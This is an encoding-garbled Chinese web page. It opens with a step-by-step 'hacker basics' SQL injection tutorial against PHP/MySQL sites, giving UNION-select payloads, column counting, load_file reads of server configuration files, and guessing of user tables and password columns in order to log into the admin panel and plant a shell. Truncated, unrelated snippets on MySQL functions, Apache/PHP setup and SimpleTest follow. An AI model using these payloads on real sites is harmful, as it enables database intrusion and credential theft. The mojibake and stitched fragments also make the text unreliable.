ºÚ¿Í»ù´¡PHP½Å±¾×¢Èë
1~ÅжÏ×¢Èëµã~ £º’;and 1=1;and 1=2 -------£¨¸úASPÒ»Ñù£©
2~ÅжÏÊÇ·ñÄܽøÐÐUNION²éѯ~£ºand ord(mid(version(),1,1))>51 -------£¨Í¨¹ý°æ±¾ÅжÏ4.0ÒÔÉÏ¿ÉÓÃUNION²éѯ£©
3~ÀûÓÃorder by ±©×Ö¶Î~£ºorder by X -------£¨XΪÊý×Ö Èç¹û·µ»ØÕý³£Ôò˵Ã÷×ֶδóÓÚX£©
4~ÀûÓÃunionÀ´²éѯ׼ȷ×Ö¶Î~£º and 1=2 union select 1,2,3,....... -------£¨·µ»ØÕý³££¬¾Í˵Ã÷²Âµ½×¼È·×Ö¶ÎÊý¡££©
5~ÅжÏÊý¾Ý¿âÁ¬½ÓÕʺÅÓÐûÓÐдȨÏÞ~£ºand (select count(*) from mysql.user)>0 ------- £¨Èç¹û·µ»Ø´íÎóÎÒÃǾͲ¹ÜÀíÔ±µÄÕʺÅÃÜÂëÈç¹û·µ»ØÕý³££¬Ôò¿ÉÒÔͨ¹ý
and 1=2 union select 1,2,3,4,5,6, load_file(char(Îļþ·¾¶µÄasciiÖµ£¬ÓöººÅ¸ô¿ª)),8,9,10 [×¢Ò⣺load_file(char(Îļþ·¾¶µÄasciiÖµ£¬ÓöººÅ¸ô¿ª))Ò²¿ÉÒÔÓÃÊ®Áù½øÖÆ£¬Í¨¹ýÕâÖÖ·½Ê½¶ÁÈ¡ÅäÖÃÎļþ]£©
6~²Â½âXXXX±í~£ºand 1=2 union select 1,2,3,4,5,6.... from user --------£¨XXXXΪ±íµ¥Ãû£¬·µ»ØÕý³££¬ËµÃ÷´æÔÚÕâ¸ö±í£©
7~²ÂXXX×Ö¶Î~£ºand 1=2 union select 1,username,3,4,5,6.... from XXXX -------£¨Í¬ÑùµÀÀí£¬×Ô¼ºÌæ»»£¬Èç¹ûÔÚ2×Ö¶ÎÏÔʾ³ö×Ö¶ÎÄÚÈÝÔò´æÔÚЩ×ֶΣ©
8~ͬÀíÔٲ½âpassword×Ö¶Î,²Â½â³É¹¦ÔÙÕÒºǫ́µÇ¼ÉÏSHELL~
Ïà¹ØÎĵµ£º
PHPÊÖ²áÉÏÌṩÁËÒÔÏÂһЩÖ÷ÒªµÄmysqlÊý¾Ý¿âµÄÖ§³Öº¯Êý£º
mysql_affected_rows -- È¡µÃÇ°Ò»´Î MySQL ²Ù×÷ËùÓ°ÏìµÄ¼Ç¼ÐÐÊý
mysql_change_user -- ¸Ä±ä»î¶¯Á¬½ÓÖеǼµÄÓû§
mysql_client_encoding -- ·µ»Ø×Ö·û¼¯µÄÃû³Æ
mysql_close -- ¹Ø±Õ MySQL Á¬½Ó
mysql_connect -- ´ò¿ªÒ»¸öµ½ MySQL ·þÎñÆ÷µÄÁ¬½Ó
mysql_c ......
1:·ÅÁË6¸öÎļþÔÚcÅÌÏÂ(php5ts.dll,libmysql.dll ,php_gd2.dll,php_mysql.dll,php_mbstring.dll ),Ò»¸öÔÚwindowsÏÂ,ÁíÎå¸öÔÚwindows/system32ÏÂ
2:ÅäÖÃÁËpath
3:ÃüÁî:httpd.exe -w -n "Apache2" -k start À´²é¿´ÊÇÄÄÒ»ÐеĴíÎóÐÅÏ¢.
×ܽá:µ½ÏÖÔÚΪֹ,ÕûÁËÒ»Ìì,×°ÁËÈý´ÎϵͳµÄÂé·³ÖÕÓÚÇ×ÉíÖ¤Ã÷ÁË,
Õâ¸ö×ï¿ý»öÊײúÉúµÄÔÒò ......
apache_2.2.8+ mysql_5.1.41+ php-5.2.12+ phpMyAdmin-3.2.5
1,°²×°apacheĬÈÏ°²×°¼´¿É
2,°ÑÏÂÔصÄphp5.2.12½âѹ°Ñ½âѹÎļþ¼ÐµÄËùÓÐÎļþ¸´ÖƵ½DÅÌPHPÎļþ¼ÐÖÐ:
3,´ò¿ªPHPÎļþ¼ÐÖаÑphp.ini-dist¸ÄΪphp.ini²¢´ò¿ª²¢°Ñ
extension=php_gd2.dll
extension=php_mbstring.dll
extension=php_mhash.dll
extension=php_mime ......
SimpleTestÊÇÒ»¸öʹÓÃÊ®·Ö¼òµ¥µÄµ¥Ôª²âÊÔ¹¤¾ß¡£
Ò»ÏÂÄÚÈÝÊÇÎÒ×Ô¼ºÉè¼ÆµÄÀûÓÃSimpleTest¶ÔÒ»¸öÏîÄ¿½øÐе¥Ôª²âÊԵĴúÂë
Ò»¡¢Îļþ½á¹¹
Ò»¸öÏîÄ¿Óжà¸öÎļþ¼Ð£¬Îļþ¼ÐÖл¹°üº¬Îļþ¼Ð¡£ÎÒÃÇÒª½øÐвâÊԵĴúÂë¼´°üº¬ÔÚÕâЩÎļ ......
